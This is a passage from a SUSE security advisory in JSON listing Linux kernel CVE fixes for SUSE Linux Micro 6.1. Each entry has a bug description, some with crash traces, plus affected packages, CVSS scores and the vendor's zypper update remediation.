"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-22047"
},
{
"cve": "CVE-2025-37813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: xhci: Fix invalid pointer dereference in Etron workaround\n\nThis check is performed before prepare_transfer() and prepare_ring(), so\nenqueue can already point at the final link TRB of a segment. And indeed\nit will, some 0.4% of times this code is called.\n\nThen enqueue + 1 is an invalid pointer. It will crash the kernel right\naway or load some junk which may look like a link TRB and cause the real\nlink TRB to be replaced with a NOOP. This wouldn\u0027t end well.\n\nUse a functionally equivalent test which doesn\u0027t dereference the pointer\nand always gives correct result.\n\nSomething has crashed my machine twice in recent days while playing with\nan Etron HC, and a control transfer stress test ran for confirmation has\njust crashed it again. The same test passes with this patch applied.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37813",
"url": "https://www.suse.com/security/cve/CVE-2025-37813"
},
{
"category": "external",
"summary": "SUSE Bug 1242909 for CVE-2025-37813",
"url": "https://bugzilla.suse.com/1242909"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-37813"
},
{
"cve": "CVE-2025-38243",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38243"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix invalid inode pointer dereferences during log replay\n\nIn a few places where we call read_one_inode(), if we get a NULL pointer\nwe end up jumping into an error path, or fallthrough in case of\n__add_inode_ref(), where we then do something like this:\n\n iput(\u0026inode-\u003evfs_inode);\n\nwhich results in an invalid inode pointer that triggers an invalid memory\naccess, resulting in a crash.\n\nFix this by making sure we don\u0027t do such dereferences.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38243",
"url": "https://www.suse.com/security/cve/CVE-2025-38243"
},
{
"category": "external",
"summary": "SUSE Bug 1246184 for CVE-2025-38243",
"url": "https://bugzilla.suse.com/1246184"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-38243"
},
{
"cve": "CVE-2025-38321",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38321"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: Log an error when close_all_cached_dirs fails\n\nUnder low-memory conditions, close_all_cached_dirs() can\u0027t move the\ndentries to a separate list to dput() them once the locks are dropped.\nThis will result in a \"Dentry still in use\" error, so add an error\nmessage that makes it clear this is what happened:\n\n[ 495.281119] CIFS: VFS: \\\\otters.example.com\\share Out of memory while dropping dentries\n[ 495.281595] ------------[ cut here ]------------\n[ 495.281887] BUG: Dentry ffff888115531138{i=78,n=/} still in use (2) [unmount of cifs cifs]\n[ 495.282391] WARNING: CPU: 1 PID: 2329 at fs/dcache.c:1536 umount_check+0xc8/0xf0\n\nAlso, bail out of looping through all tcons as soon as a single\nallocation fails, since we\u0027re already in trouble, and kmalloc() attempts\nfor subseqeuent tcons are likely to fail just like the first one did.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38321",
"url": "https://www.suse.com/security/cve/CVE-2025-38321"
},
{
"category": "external",
"summary": "SUSE Bug 1246328 for CVE-2025-38321",
"url": "https://bugzilla.suse.com/1246328"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-38321"
},
{
"cve": "CVE-2025-38322",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38322"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/intel: Fix crash in icl_update_topdown_event()\n\nThe perf_fuzzer found a hard-lockup crash on a RaptorLake machine:\n\n Oops: general protection fault, maybe for address 0xffff89aeceab400: 0000\n CPU: 23 UID: 0 PID: 0 Comm: swapper/23\n Tainted: [W]=WARN\n Hardware name: Dell Inc. Precision 9660/0VJ762\n RIP: 0010:native_read_pmc+0x7/0x40\n Code: cc e8 8d a9 01 00 48 89 03 5b cd cc cc cc cc 0f 1f ...\n RSP: 000:fffb03100273de8 EFLAGS: 00010046\n ....\n Call Trace:\n \u003cTASK\u003e\n icl_update_topdown_event+0x165/0x190\n ? ktime_get+0x38/0xd0\n intel_pmu_read_event+0xf9/0x210\n __perf_event_read+0xf9/0x210\n\nCPUs 16-23 are E-core CPUs that don\u0027t support the perf metrics feature.\nThe icl_update_topdown_event() should not be invoked on these CPUs.\n\nIt\u0027s a regression of commit:\n\n f9bdf1f95339 (\"perf/x86/intel: Avoid disable PMU if !cpuc-\u003eenabled in sample read\")\n\nThe bug introduced by that commit is that the is_topdown_event() function\nis mistakenly used to replace the is_topdown_count() call to check if the\ntopdown functions for the perf metrics feature should be invoked.\n\nFix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38322",
"url": "https://www.suse.com/security/cve/CVE-2025-38322"
},
{
"category": "external",
"summary": "SUSE Bug 1246447 for CVE-2025-38322",
"url": "https://bugzilla.suse.com/1246447"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-38322"
},
{
"cve": "CVE-2025-38379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix warning when reconnecting channel\n\nWhen reconnecting a channel in smb2_reconnect_server(), a dummy tcon\nis passed down to smb2_reconnect() with -\u003equery_interface\nuninitialized, so we can\u0027t call queue_delayed_work() on it.\n\nFix the following warning by ensuring that we\u0027re queueing the delayed\nworker from correct tcon.\n\nWARNING: CPU: 4 PID: 1126 at kernel/workqueue.c:2498 __queue_delayed_work+0x1d2/0x200\nModules linked in: cifs cifs_arc4 nls_ucs2_utils cifs_md4 [last unloaded: cifs]\nCPU: 4 UID: 0 PID: 1126 Comm: kworker/4:0 Not tainted 6.16.0-rc3 #5 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-4.fc42 04/01/2014\nWorkqueue: cifsiod smb2_reconnect_server [cifs]\nRIP: 0010:__queue_delayed_work+0x1d2/0x200\nCode: 41 5e 41 5f e9 7f ee ff ff 90 0f 0b 90 e9 5d ff ff ff bf 02 00\n00 00 e8 6c f3 07 00 89 c3 eb bd 90 0f 0b 90 e9 57 f\u003e 0b 90 e9 65 fe\nff ff 90 0f 0b 90 e9 72 fe ff ff 90 0f 0b 90 e9\nRSP: 0018:ffffc900014afad8 EFLAGS: 00010003\nRAX: 0000000000000000 RBX: ffff888124d99988 RCX: ffffffff81399cc1\nRDX: dffffc0000000000 RSI: ffff888114326e00 RDI: ffff888124d999f0\nRBP: 000000000000ea60 R08: 0000000000000001 R09: ffffed10249b3331\nR10: ffff888124d9998f R11: 0000000000000004 R12: 0000000000000040\nR13: ffff888114326e00 R14: ffff888124d999d8 R15: ffff888114939020\nFS: 0000000000000000(0000) GS:ffff88829f7fe000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007ffe7a2b4038 CR3: 0000000120a6f000 CR4: 0000000000750ef0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n queue_delayed_work_on+0xb4/0xc0\n smb2_reconnect+0xb22/0xf50 [cifs]\n smb2_reconnect_server+0x413/0xd40 [cifs]\n ? __pfx_smb2_reconnect_server+0x10/0x10 [cifs]\n ? local_clock_noinstr+0xd/0xd0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n process_one_work+0x4c5/0xa10\n ? __pfx_process_one_work+0x10/0x10\n ? __list_add_valid_or_report+0x37/0x120\n worker_thread+0x2f1/0x5a0\n ? __kthread_parkme+0xde/0x100\n ? __pfx_worker_thread+0x10/0x10\n kthread+0x1fe/0x380\n ? kthread+0x10f/0x380\n ? __pfx_kthread+0x10/0x10\n ? local_clock_noinstr+0xd/0xd0\n ? ret_from_fork+0x1b/0x1f0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n ? rcu_is_watching+0x20/0x50\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x15b/0x1f0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\nirq event stamp: 1116206\nhardirqs last enabled at (1116205): [\u003cffffffff8143af42\u003e] __up_console_sem+0x52/0x60\nhardirqs last disabled at (1116206): [\u003cffffffff81399f0e\u003e] queue_delayed_work_on+0x6e/0xc0\nsoftirqs last enabled at (1116138): [\u003cffffffffc04562fd\u003e] __smb_send_rqst+0x42d/0x950 [cifs]\nsoftirqs last disabled at (1116136): [\u003cffffffff823d35e1\u003e] release_sock+0x21/0xf0",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
